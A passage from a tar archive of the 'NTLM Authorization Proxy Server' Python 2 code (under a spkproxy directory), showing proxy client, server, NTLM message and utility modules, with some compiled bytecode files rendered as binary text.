socket.SOCK_STREAM) s.connect((rs, rsp)) self.rserver_socket = s self.rserver_socket_closed = 0 self.current_rserver_net_location = '%s:%d' % (rs, rsp) self.logger.log('Done.\n') except: self.rserver_socket_closed = 1 self.logger.log('Failed.\n') self.exit() thread.exit() #------------------------------------------------- def close_rserver(self): "" self.logger.log('*** Closing connection to the remote server...') self.rserver_socket.close() self.rserver_socket_closed = 1 self.current_rserver_net_location = '' self.logger.log('Done.\n') #------------------------------------------------- def close_client(self): "" self.logger.log('*** Closing connection to the client...') self.client_socket.close() self.client_socket_closed = 1 self.logger.log('Done.\n') #----------------------------------------------------------------------- def auth_407(self): "" auth = self.rserver_head_obj.get_param_values('Proxy-Authenticate') upper_auth = [] msg = '' for i in auth: msg = msg + ", %s" % i upper_auth.append(string.upper(i)) self.logger.log('*** Authentication methods allowed: ' + msg[2:] + '\n') # NOTE that failed auth is detected now just after any failed atempt. # May it will be of use to keep trying till all the methods will fail. if self.proxy_authorization_tried: self.logger.log('*** Looks like our authorization failed.\n*** Passing 407 to client.\n') else: self.proxy_authorization_tried = 1 self.rollback_client_data() # Method selector. Should try the most secure method. if 'NTLM' in upper_auth: self.logger.log('*** Using NTLM authentication method.\n') #self.proxy_ntlm_authorization() self.ntlm_auther.proxy_ntlm_authentication(self) elif 'BASIC_' in upper_auth: self.logger.log('*** Using Basic authentication method.\n') #self.basic_authorization() self.basic_auther.proxy_basic_authentication(self) else: self.logger.log('*** There are no supported authentication methods in remote server response.\n') self.logger.log('*** Passing 407 to client.\n') #----------------------------------------------------------------------- def auth_401(self): "" auth = self.rserver_head_obj.get_param_values('Www-Authenticate') upper_auth = [] msg = '' for i in auth: msg = msg + ", %s" % i upper_auth.append(string.upper(i)) self.logger.log('*** Authentication methods allowed: ' + msg[2:] + '\n') # NOTE that failed auth is detected now just after any failed atempt. # May it will be of use to keep trying till all the methods will fail. if self.www_authorization_tried: self.logger.log('*** Looks like our authorization failed.\n*** Passing 401 to client.\n') else: self.www_authorization_tried = 1 self.rollback_client_data() # Method selector. Should try the most secure method. if 'NTLM' in upper_auth: self.logger.log('*** Using NTLM authentication method.\n') #self.www_ntlm_authorization() self.ntlm_auther.www_ntlm_authentication(self) elif 'BASIC_' in upper_auth: self.logger.log('*** Using Basic authentication method.\n') #self.basic_authorization() self.basic_auther.www_basic_authentication(self) else: self.logger.log('*** There are no supported authentication methods in the Web Server response.\n') self.logger.log('*** Passing 401 to client.\n') #----------------------------------------------------------------------- def auth_routine(self): "" self.logger.log('*** Authentication routine started.\n') code = self.rserver_head_obj.get_http_code() if code == '407': self.logger.log('*** Got Error 407 - "Proxy authentication required".\n') self.auth_407() elif code == '401': self.logger.log('*** Got Error 401 - "WWW authentication required".\n') self.auth_401() else: self.logger.log('*** Authentication not required.\n') self.logger.log('*** Authentication routine finished.\n') #----------------------------------------------------------------------- def check_rserver_response(self): "" if self.rserver_header_sent == 1: code = self.rserver_head_obj.get_http_code() if code == '100': # reaction on response '100' - 'Continue' self.logger.log("*** Got and sent to client response '100'. Need to prepare for final response.\n") self.reset_rserver() if code not in ['401', '407']: # if we have at least one request successfully served # then we have to clear up authentication flags to be ready # to authenticate yourself again if there is such a need if self.proxy_authorization_tried or self.www_authorization_tried: self.proxy_authorization_tried = 0 self.www_authorization_tried = 0 self.logger.log('*** Lowered authentication flags down. As the code is neither 401 nor 407.\n') #----------------------------------------------------------------------- # Need not for proxy module... def check_connected_remote_server(self): "" pass spkproxy/ntlm/server.py0100664000076500007650000000473107562540467014270 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import socket, thread, sys import proxy_client, www_client #-------------------------------------------------------------- class AuthProxyServer: pass #-------------------------------------------------------------- def __init__(self, config): "" self.config = config self.MyHost = '' self.ListenPort = self.config['GENERAL']['LISTEN_PORT'] #-------------------------------------------------------------- def run(self): "" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((self.MyHost, self.ListenPort)) except: print "ERROR: Could not create socket. Possible it is used by other process." print "Bye." sys.exit() while(1): s.listen(5) conn, addr = s.accept() if self.config['GENERAL']['ALLOW_EXTERNAL_CLIENTS']: self.client_run(conn, addr) else: if addr[0] in self.config['GENERAL']['FRIENDLY_IPS']: self.client_run(conn, addr) else: conn.close() s.close() #-------------------------------------------------------------- def client_run(self, conn, addr): "" if self.config['GENERAL']['PARENT_PROXY']: # working with MS Proxy c = proxy_client.proxy_HTTP_Client(conn, addr, self.config) else: # working with MS IIS and any other c = www_client.www_HTTP_Client(conn, addr, self.config) thread.start_new_thread(c.run, ()) spkproxy/ntlm/U32.py0100664000076500007650000000572007562540467013332 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # C = 0x1000000000L def norm(n): return n & 0xFFFFFFFFL class U32: v = 0L def __init__(self, value = 0): self.v = C + norm(abs(long(value))) def set(self, value = 0): self.v = C + norm(abs(long(value))) def __repr__(self): return hex(norm(self.v)) def __long__(self): return long(norm(self.v)) def __int__(self): return int(norm(self.v)) def __chr__(self): return chr(norm(self.v)) def __add__(self, b): r = U32() r.v = C + norm(self.v + b.v) return r def __sub__(self, b): r = U32() if self.v < b.v: r.v = C + norm(0x100000000L - (b.v - self.v)) else: r.v = C + norm(self.v - b.v) return r def __mul__(self, b): r = U32() r.v = C + norm(self.v * b.v) return r def __div__(self, b): r = U32() r.v = C + (norm(self.v) / norm(b.v)) return r def __mod__(self, b): r = U32() r.v = C + (norm(self.v) % norm(b.v)) return r def __neg__(self): return U32(self.v) def __pos__(self): return U32(self.v) def __abs__(self): return U32(self.v) def __invert__(self): r = U32() r.v = C + norm(~self.v) return r def __lshift__(self, b): r = U32() r.v = C + norm(self.v << b) return r def __rshift__(self, b): r = U32() r.v = C + (norm(self.v) >> b) return r def __and__(self, b): r = U32() r.v = C + norm(self.v & b.v) return r def __or__(self, b): r = U32() r.v = C + norm(self.v | b.v) return r def __xor__(self, b): r = U32() r.v = C + norm(self.v ^ b.v) return r def __not__(self): return U32(not norm(self.v)) def truth(self): return norm(self.v) def __cmp__(self, b): if norm(self.v) > norm(b.v): return 1 elif norm(self.v) < norm(b.v): return -1 else: return 0 def __nonzero__(self): return norm(self.v)spkproxy/ntlm/des.pyc0100664000076500007650000000521207562544407013671 0ustar davedave- =cs_dkZdkZdfdYZ1dZ4dZAdZTdZdS(NsDEScs8tZeZdZ$dZ)dZRS(NcsOt|}t|} ti|}!ti||_ dS(sN( s str_to_key56skey_strskskey56_to_key64s ntlmutilsslst2strsdes_csDESsselfs des_c_obj(sselfskey_strsk((s ntlm/des.pys__init__s cs$%&|ii|SdS(sN(sselfs des_c_objsencrypts plain_text(sselfs plain_text((s ntlm/des.pysencrypt$scs)*+|ii|SdS(sN(sselfs des_c_objsdecrypts crypted_text(sselfs crypted_text((s ntlm/des.pysdecrypt)s(s__name__s __module__sNones des_c_objs__init__sencryptsdecrypt(((s ntlm/des.pysDESs    s DESExceptioncs456t|tdjo8n9t|djo:|ddt| }n;g}<x+|d D<]}<|it|quW>|SdS(sisN(stypeskey_strslenskey_56sisappendsord(skey_strsiskey_56((s ntlm/des.pys str_to_key564s  cs^ABCg}Dx'tdDD]}D|idqWF|d|d<G|dd>d@|dd?B|d<H|dd>d@|dd?B|d<I|dd>d@|d d ?B|d <J|d d >d@|d d ?B|d <K|d d >d@|dd?B|d<L|dd>d@|dd?B|d<M|dd>d@|d<Ot|}Q|Sd S( siiiiiiiiiiN(skeysrangesisappendskey_56sset_key_odd_parity(skey_56siskey((s ntlm/des.pyskey56_to_key64As  %%%%%%csTUVx~tt|DV]g}WxBtdDW]1}Xd}Y|||?}Z||Ad@}q5W[||d@|B|| # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import string, socket, thread, select, time import logger, http_header, utils import ntlm_auth, basic_auth import proxy_client class www_HTTP_Client(proxy_client.proxy_HTTP_Client): #------------------------------------------------- def connect_rserver(self): "" self.logger.log('*** Connecting to remote server...') self.first_run = 0 # we don't have proxy then we have to connect server by ourselves rs, rsp = self.client_head_obj.get_http_server() self.logger.log('(%s:%d)...' % (rs, rsp)) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((rs, rsp)) self.rserver_socket = s self.rserver_socket_closed = 0 self.current_rserver_net_location = '%s:%d' % (rs, rsp) self.logger.log('Done.\n') except: self.rserver_socket_closed = 1 self.logger.log('Failed.\n') self.exit() thread.exit() #----------------------------------------------------------------------- def fix_client_header(self): "" self.logger.log('*** Replacing values in client header...') if self.config.has_key('CLIENT_HEADER'): for i in self.config['CLIENT_HEADER'].keys(): self.client_head_obj.del_param(i) self.client_head_obj.add_param_value(i, self.config['CLIENT_HEADER'][i]) self.logger.log('Done.\n') # self.logger.log('*** New client header:\n=====\n' + self.client_head_obj.__repr__()) else: self.logger.log('No need.\n*** There is no "CLIENT_HEADER" section in server.cfg.\n') self.logger.log("*** Working as selfcontained proxy, then have to change client header.\n") self.logger.log("*** Remake url format in client header...") self.client_head_obj.make_right_header() self.logger.log('Done.\n') self.client_head_obj.del_param('Keep-Alive') self.logger.log("*** Just killed 'Keep-Alive' value in the header.\n") # Code which converts 'Proxy-Connection' value to 'Connection' # I am not sure that it is needed at all # May be it is just useless activity self.logger.log("*** Looking for 'Proxy-Connection' in client header...") pconnection = self.client_head_obj.get_param_values('Proxy-Connection') if pconnection: # if we have 'Proxy-Connection' self.logger.log("there are some.\n") wconnection = self.client_head_obj.get_param_values('Connection') if wconnection: # if we have 'Connection' as well self.logger.log("*** There is a 'Connection' value in the header.\n") self.client_head_obj.del_param('Proxy-Connection') self.logger.log("*** Just killed 'Proxy-Connection' value in the header.\n") else: self.logger.log("*** There is no 'Connection' value in the header.\n") self.client_head_obj.del_param('Proxy-Connection') for i in pconnection: self.client_head_obj.add_param_value('Connection', i) self.logger.log("*** Changed 'Proxy-Connection' to 'Connection' header value.\n") else: self.logger.log("there aren't any.\n") # End of doubtable code. # Show reworked header. self.logger.log('*** New client header:\n=====\n' + self.client_head_obj.__repr__()) #----------------------------------------------------------------------- def check_connected_remote_server(self): "" # if we are working as a standalone proxy server rs, rsp = self.client_head_obj.get_http_server() if self.current_rserver_net_location != '%s:%d' % (rs, rsp): # if current connection is not we need then close it. self.logger.log('*** We had wrong connection for new request so we have to close it.\n') self.close_rserver() spkproxy/ntlm/ntlmutils.py0100664000076500007650000000775107562540467015022 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import string hd = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F',] #-------------------------------------------------------------------------------------------- def str2hex_num(str): res = 0L for i in str: res = res << 8 res = res + long(ord(i)) return hex(res) #-------------------------------------------------------------------------------------------- def str2hex(str, delimiter=''): res = '' for i in str: res = res + hd[ord(i)/16] res = res + hd[ord(i) - ((ord(i)/16) * 16)] res = res + delimiter return res #-------------------------------------------------------------------------------------------- def str2dec(str, delimiter=''): res = '' for i in str: res = res + '%3d' % ord(i) res = res + delimiter return res #-------------------------------------------------------------------------------------------- def hex2str(hex_str): res = '' for i in range(0, len(hex_str), 2): res = res + (chr(hd.index(hex_str[i]) * 16 + hd.index(hex_str[i+1]))) return res #-------------------------------------------------------------------------------------------- def str2prn_str(bin_str, delimiter=''): "" res = '' for i in bin_str: if ord(i) > 31: res = res + i else: res = res + '.' res = res + delimiter return res #-------------------------------------------------------------------------------------------- def byte2bin_str(char): "" res = '' t = ord(char) while t > 0: t1 = t / 2 if t != 2 * t1: res = '1' + res else: res = '0' + res t = t1 if len(res) < 8: res = '0' * (8 - len(res)) + res return res #-------------------------------------------------------------------------------------------- def str2lst(str): res = [] for i in str: res.append(ord(i)) return res #-------------------------------------------------------------------------------------------- def lst2str(lst): res = '' for i in lst: res = res + chr(i & 0xFF) return res #-------------------------------------------------------------------------------------------- def int2chrs(number_int): "" return chr(number_int & 0xFF) + chr((number_int >> 8) & 0xFF) #-------------------------------------------------------------------------------------------- def bytes2int(bytes): "" return ord(bytes[1]) * 256 + ord(bytes[0]) #-------------------------------------------------------------------------------------------- def int2hex_str(number_int16): "" res = '0x' ph = int(number_int16) / 256 res = res + hd[ph/16] res = res + hd[ph - ((ph/16) * 16)] pl = int(number_int16) - (ph * 256) res = res + hd[pl/16] res = res + hd[pl - ((pl/16) * 16)] return res #-------------------------------------------------------------------------------------------- def str2unicode(string): "converts ascii string to dumb unicode" res = '' for i in string: res = res + i + '\000' return res spkproxy/ntlm/ntlmutils.pyc0100664000076500007650000001013607562540704015146 0ustar davedave- 7=csdkZddddddddd d d d d dddgZdZ!ddZ*ddZ3dZ:ddZDdZRdZYdZ `dZ edZ jdZ xdZ dS(Ns0s1s2s3s4s5s6s7s8s9sAsBsCsDsEsFcsZd}x7|D],}|d>}|tt|}qWt|SdS(Nli(sressstrsislongsordshex(sstrsisres((sntlm/ntlmutils.pys str2hex_nums    scs!"d}#xb|D#]W}$|tt|d}%|tt|t|dd}&||}qW'|SdS(Nsi(sressstrsishdsords delimiter(sstrs delimitersisres((sntlm/ntlmutils.pysstr2hex!s  )csR*+d},x5|D,]*}-|dt|}.||}qW/|SdS(Nss%3d(sressstrsisords delimiter(sstrs delimitersisres((sntlm/ntlmutils.pysstr2dec*s   csy34d}5x\tdt|dD5]?}6|tti||dti||d}q(W7|SdS(Nsiiii(sressrangeslenshex_strsischrshdsindex(shex_strsisres((sntlm/ntlmutils.pyshex2str3s   =csr:;<d}=xR|D=]G}>t|djo>||}n?|d}@||}qWA|SdS(sis.N(sressbin_strsisords delimiter(sbin_strs delimitersressi((sntlm/ntlmutils.pys str2prn_str:s   csDEFd}Gt|}Hx]H|djoLI|d}J|d|joJd|}nKd|}L|}q$WMt|djoMddt||}nO|SdS(siis1s0iN(sressordscharstst1slen(scharstsresst1((sntlm/ntlmutils.pys byte2bin_strDs   csDRSg}Tx'|DT]}U|it|qWV|SdS(N(sressstrsisappendsord(sstrsisres((sntlm/ntlmutils.pysstr2lstRs   csEYZd}[x(|D[]}\|t|d@}qW]|SdS(Nsi(sresslstsischr(slstsisres((sntlm/ntlmutils.pyslst2strYs   cs-`abt|d@t|d?d@SdS(siiN(schrs number_int(s number_int((sntlm/ntlmutils.pysint2chrs`scs-efgt|ddt|dSdS(siiiN(sordsbytes(sbytes((sntlm/ntlmutils.pys bytes2intescsjkld}mt|d}n|t|d}o|t||dd}qt||d}r|t|d}s|t||dd}u|SdS(ss0xiiN(sressints number_int16sphshdspl(s number_int16sressphspl((sntlm/ntlmutils.pys int2hex_strjs csBxyzd}{x"|D{]}|||d}qW}|SdS(s%converts ascii string to dumb unicodessN(sressstringsi(sstringsisres((sntlm/ntlmutils.pys str2unicodexs   (sstringshds str2hex_numsstr2hexsstr2decshex2strs str2prn_strs byte2bin_strsstr2lstslst2strsint2chrss bytes2ints int2hex_strs str2unicode(sstr2decs str2hex_nums byte2bin_strsstringsstr2hexs int2hex_strshex2strs str2unicodes str2prn_strs bytes2intslst2strsint2chrsshdsstr2lst((sntlm/ntlmutils.pys?s9         spkproxy/ntlm/ntlm_messages.pyc0100664000076500007650000003072307562544343015763 0ustar davedave- =csdkZdkZdkZdkZdfdYZ/dZEdZdZdZdZ dZ d Z d Z 'd Z dS( Nsrecordcs&tZddZ#dZRS(NicsJ||_t||_d|_|i|i|_dS(siN(sdatasselfslensoffsets next_offset(sselfsdatasoffset((sntlm/ntlm_messages.pys__init__s   cst#$%||_&ti|i}'|}(ti|i})|||d|_,||i|_ dS(ssN( soffsetsselfs ntlmutilssint2chrsslenslen1slen2sdata_offs record_infos next_offset(sselfsoffsetslen2slen1sdata_off((sntlm/ntlm_messages.pyscreate_record_info#s  (s__name__s __module__s__init__screate_record_info(((sntlm/ntlm_messages.pysrecords  c s/01|}3d} 4d} 5d}7ti|d}9d}:d};d}<d}>| | ||||||}?t i|}@ti|d d}B|Sd S( ssNTLMSSPsssFLAGSs s s0s0s N(senvironment_dictsedsprotocolstypeszeros1s ntlmutilsshex2strsflagsszeros2szeros3ssmthg1ssmthg2smsg1sbase64s encodestringsstringsreplace( senvironment_dictsmsg1szeros1szeros3szeros2sedssmthg2ssmthg1sflagssprotocolstype((sntlm/ntlm_messages.pyscreate_message1/s        %csEFG|}Iti|d} Kd}Ld}M||d}Ot|d}Pt|d}Qt|d} Std}U|do#Vtt i|d |}nXtd}Z|d o#[tt i|d |} n]td} `t|d d } c|ddjod| d t| } ng|i| h|i|ii| i|ij|i| ik| i|il|i| io|i|i| i|i| i}r||i| i|i|i| i} v|ddjow| |i| } ny| |} ||ddjo}| |i} nti| } ti| dd} | SdS(ssFLAGSsNTLMSSPsssDOMAINsUSERsHOSTsLMs LM_HASHED_PWsNTs NT_HASHED_PWiis NTLM_MODEis N(senvironment_dictseds ntlmutilsshex2strsflagssprotocolstypesheadsrecords domain_recsuser_recshost_recsadditional_recs ntlm_procss calc_respsnonceslm_recsnt_recslens domain_offsetscreate_record_infos next_offsetsdatas data_parts record_infosm3sbase64s encodestringsstringsreplace(snoncesenvironment_dictsheadsprotocolsedsadditional_recslm_recs data_parts domain_recsnt_recsflagsshost_recsm3s domain_offsetstypesuser_rec((sntlm/ntlm_messages.pyscreate_message3EsF   ##(, cs3ti|}|dd!}|SdS(sii N(sbase64s decodestringsmsg2snonce(smsg2snonce((sntlm/ntlm_messages.pysparse_message2scs7h}d}ti|dd!|d<ti|dd!|d<ti|dd!|d<|dti|}|d ti|d|df}|d ti|d|df}|d ti|d|df}|d ti|d }||d<|SdS(siislen1islen2isoffsets*%s length (two times), offset, delimiter s%s decimal: %3d # length 1 s%s decimal: %3d # length 2 s%s decimal: %3d # offset s.%s # delimiter (two zeros) isstringN(sitemsress ntlmutilss bytes2intsitem_strsstr2hexs int2hex_str(sitem_strsitemsres((sntlm/ntlm_messages.pysitems  ((( csd}|dti|}ti|dd!}|dti|}|d}|dti|dti|df}ti|dd!}|d ti|}|d}|dti|d ti|df}|Sd S( ss%s iis%s # flags s!Binary: layout 87654321 87654321 s %s %s iis&%s # more flags ??? iN( sress ntlmutilssstr2hexsflag_strs bytes2intsflagss int2hex_strs byte2bin_strsflags2(sflag_strsressflagssflags2((sntlm/ntlm_messages.pysflagss  1 1csqd}|dti|d}|dti|d}|dti|d}|SdS(ss Hex : %s s sString : %s s s Decimal: %s s N(sress ntlmutilssstr2hexsbin_strs str2prn_strsstr2dec(sbin_strsres((sntlm/ntlm_messages.pys unknown_parts  csti|}ti|}d}|d}|d}|d}|d|}|dti|}|d|}d}|d}d}|d |||dd !f}|d |dd !ti|dd !f}|d|dd!|d d!f}|d|dd !}||}|d}d}|d||f}|t ||||!}||}|d}t ||}|d||f}|t ||||!}|d}|SdS(ss?============================================================== sNTLM Message 1 report: s"--------------------------------- s Base64: %s s String: %s sHex: %s ii sHeader %d/%d: %s is0%s method name 0/8 %s # C string iis&0x%s%s # message type iis)%s # delimiter (zeros) is Flags %d/%d sRest of the message %d/%d: s End of message 1 report. N(sbase64s decodestringsmsgsm_s ntlmutilssstr2hexsm_hexsress str2prn_strscurscur_lensflagsslens unknown_part(smsgscursressm_hexsm_scur_len((sntlm/ntlm_messages.pysdebug_message1s:       !.%      csti|}ti|}d}|d}|d}|d}|d|}|dti|}|d|}d}|d}d}|d |||dd !f}|d |dd !ti|dd !f}|d|dd!|d d!f}|d|dd !}||}|d}d }|d||||d||d!f}d }|d||f}t ||||!}||d}||}|d}d}|d||f}|t ||||!} ||} |d} d } |d||||d||d!f}||}|d}|d|}|d||f}|t||||!}||}|d}|d}|d||f}|d||d||d!}|dti||||!}||}|d}t||}|d||f} |t||||!}"|d}$|Sd S(!ss?============================================================== sNTLM Message 2 report: s"--------------------------------- s Base64: %s s String: %s sHex: %s ii sHeader %d/%d: %s is0%s method name 0/8 %s # C string iis&0x%s%s # message type iis)%s # delimiter (zeros) s Lengths and Positions %d/%d %s isDomain ??? %d/%d sstringis Flags %d/%d sNONCE %d/%d %s soffsetsUnknown data %d/%d: slen1sDomain ??? %d/%d: s String: %s sRest of the message %d/%d: s End of message 2 report. N(sbase64s decodestringsmsgsm_s ntlmutilssstr2hexsm_hexsress str2prn_strscurscur_lensitemsdomsflagss unknown_partslen(smsgscursdomsressm_hexsm_scur_len((sntlm/ntlm_messages.pysdebug_message2sh       !.%   -       -     $%   c s'()ti|} *ti| },d}-|d}.|d}/|d}0|d|}1|dti| }2|d|}3d}5|d}6d} 7|d || |dd !f}8|d |dd !ti| dd !f}9|d|dd!|d d!f}:|d|dd !};|| }=|d}>d} ?|d|| ||d|| d!f}Ad } B|d|| f}Ct | ||| !}D||d}E|| }Gd } H|d|| f}It | ||| !}J||d}K|| }Md } N|d|| f}Ot | ||| !}P||d}Q|| }Sd } T|d|| f}Ut | ||| !}V||d}W|| }Yd } Z|d|| f}[t | ||| !}\||d}]|| }_d } `|d|| f}at | ||| !} b|| d}c|| }e|d}fd} g|d|| f}h|t| ||| !}i|| }k|d}l|d|d|d} m|d|| ||d|| d!ti| ||| !f}o|d} p|d ||d|| d!}q|d!|| f}r|d"ti| ||| !}s|| }u|d} v|d ||d|| d!}w|d#|| f}x|d"ti| ||| !}y|| }{|d} ||d ||d|| d!}}|d$|| f}~|d"ti| ||| !}|| }|d}|d} |d%|| ||d|| d!f}|| }|d}|d} |d&|| ||d|| d!f}|| }|d}t| |} |d'|| f}|t| ||| !}|d(}|Sd)S(*ss?============================================================== sNTLM Message 3 report: s"--------------------------------- s Base64: %s s String: %s sHex: %s ii sHeader %d/%d: %s is0%s method name 0/8 %s # C string iis&0x%s%s # message type iis)%s # delimiter (zeros) i0s Lengths and Positions %d/%d %s isLAN Manager response %d/%d sstringsNT response %d/%d sDomain string %d/%d sUser string %d/%d sHost string %d/%d sUnknow item record %d/%d is Flags %d/%d slen1s(Domain, User, Host strings %d/%d %s %s s%s sDomain name %d/%d: s%s sUser name %d/%d: sHost name %d/%d: sLAN Manager response %d/%d %s sNT response %d/%d %s sRest of the message %d/%d: s End of message 3 report. N(sbase64s decodestringsmsgsm_s ntlmutilssstr2hexsm_hexsress str2prn_strscurscur_lensitemslmrsntrsdomsusershostsunknownsflagsslens unknown_part( smsgsntrscursdomsresslmrshostsm_hexsusersunknownsm_scur_len((sntlm/ntlm_messages.pysdebug_message3's       !.%   -                D $%  $%  $%   -   -   (s ntlm_procss ntlmutilssbase64sstringsrecordscreate_message1screate_message3sparse_message2sitemsflagss unknown_partsdebug_message1sdebug_message2sdebug_message3(sparse_message2screate_message3sstringscreate_message1sitems ntlmutilssdebug_message1srecordsdebug_message3s ntlm_procssbase64sflagss unknown_partsdebug_message2((sntlm/ntlm_messages.pys?s  A   & Aspkproxy/ntlm/ntlm_messages.py~0100664000076500007650000003475407562540467016031 0ustar davedave# This file is part of 'NTLM Authorization Proxy Server' # Copyright 2001 Dmitry A. Rozmanov # # NTLM APS is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # NTLM APS is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with the sofware; see the file COPYING. If not, write to the # Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. # import ntlm_procs, utils import base64, string #--------------------------------------------------------------------- class record: def __init__(self, data, offset=0): "" self.data = data self.len = len(data) self.offset = 0 self.next_offset = self.offset + self.len #--------------------------------------------------------------------- # helper function for creation info field in message 3 def create_record_info(self, offset): "" self.offset = offset len1 = utils.int2chrs(self.len) len2 = len1 data_off = utils.int2chrs(self.offset) self.record_info = len1 + len2 + data_off + '\000\000' # looks like the length is always = 8 bytes self.next_offset = offset + self.len #--------------------------------------------------------------------- def create_message1(environment_dict): "" ed = environment_dict # overall lenght = 48 bytes protocol = 'NTLMSSP\000' #name type = '\001\000' #type 1 zeros1 = '\000\000' flags = utils.hex2str(ed['FLAGS']) zeros2 = '\000\000\000\000\000\000\000\000\000' zeros3 = '\000\000\000\000\000\000\000\000\000\000\000' smthg1 = '0\000\000\000\000\000\000\000' # something with chr(48) length? smthg2 = '0\000\000\000' # something with chr(48) lenght? msg1 = protocol + type + zeros1 + flags + zeros2 + zeros3 + smthg1 + smthg2 msg1 = base64.encodestring(msg1) msg1 = string.replace(msg1, '\012', '') return msg1 #--------------------------------------------------------------------- def create_message3(nonce, environment_dict): "" ed = environment_dict flags = utils.hex2str(ed['FLAGS']) protocol = 'NTLMSSP\000' #name type = '\003\000' #type 3 head = protocol + type + '\000\000' domain_rec = record(ed['DOMAIN']) user_rec = record(ed['USER']) host_rec = record(ed['HOST']) additional_rec = record('') if ed['LM']: lm_rec = record(ntlm_procs.calc_resp(ed['LM_HASHED_PW'], nonce)) else: lm_rec = record('') if ed['NT']: nt_rec = record(ntlm_procs.calc_resp(ed['NT_HASHED_PW'], nonce)) else: nt_rec = record('') # length of the head and five infos for LM, NT, Domain, User, Host domain_offset = len(head) + 5 * 8 # and unknown record info and flags' lenght if ed['NTLM_MODE'] == 0: domain_offset = domain_offset + 8 + len(flags) # create info fields domain_rec.create_record_info(domain_offset) user_rec.create_record_info(domain_rec.next_offset) host_rec.create_record_info(user_rec.next_offset) lm_rec.create_record_info(host_rec.next_offset) nt_rec.create_record_info(lm_rec.next_offset) additional_rec.create_record_info(nt_rec.next_offset) # data part of the message 3 data_part = domain_rec.data + user_rec.data + host_rec.data + lm_rec.data + nt_rec.data # build message 3 m3 = head + lm_rec.record_info + nt_rec.record_info + domain_rec.record_info + \ user_rec.record_info + host_rec.record_info # Experimental feature !!! if ed['NTLM_MODE'] == 0: m3 = m3 + additional_rec.record_info + flags m3 = m3 + data_part # Experimental feature !!! if ed['NTLM_MODE'] == 0: m3 = m3 + additional_rec.data # base64 encode m3 = base64.encodestring(m3) m3 = string.replace(m3, '\012', '') return m3 #--------------------------------------------------------------------- def parse_message2(msg2): "" msg2 = base64.decodestring(msg2) # protocol = msg2[0:7] # msg_type = msg2[7:9] nonce = msg2[24:32] return nonce #--------------------------------------------------------------------- def item(item_str): "" item = {} res = '' item['len1'] = utils.bytes2int(item_str[0:2]) item['len2'] = utils.bytes2int(item_str[2:4]) item['offset'] = utils.bytes2int(item_str[4:6]) res = res + '%s\n\nlength (two times), offset, delimiter\n' % (utils.str2hex(item_str)) res = res + '%s decimal: %3d # length 1\n' % (utils.int2hex_str(item['len1']), item['len1']) res = res + '%s decimal: %3d # length 2\n' % (utils.int2hex_str(item['len2']), item['len2']) res = res + '%s decimal: %3d # offset\n' % (utils.int2hex_str(item['offset']), item['offset']) res = res + '%s # delimiter (two zeros)\n\n' % utils.str2hex(item_str[-2:]) item['string'] = res return item #--------------------------------------------------------------------- def flags(flag_str): "" res = '' res = res + '%s\n\n' % utils.str2hex(flag_str) flags = utils.bytes2int(flag_str[0:2]) res = res + '%s # flags\n' % (utils.int2hex_str(flags)) res = res + 'Binary:\nlayout 87654321 87654321\n' res = res + ' %s %s\n' % (utils.byte2bin_str(flag_str[1]), utils.byte2bin_str(flag_str[0])) flags2 = utils.bytes2int(flag_str[2:4]) res = res + '%s # more flags ???\n' % (utils.int2hex_str(flags2)) res = res + 'Binary:\nlayout 87654321 87654321\n' res = res + ' %s %s\n' % (utils.byte2bin_str(flag_str[3]), utils.byte2bin_str(flag_str[2])) #res = res + '%s # delimiter ???\n' % m_hex[(cur + 2) * 2: (cur + 4) * 2] return res #--------------------------------------------------------------------- def unknown_part(bin_str): "" res = '' res = res + 'Hex : %s\n' % utils.str2hex(bin_str, ' ') res = res + 'String : %s\n' % 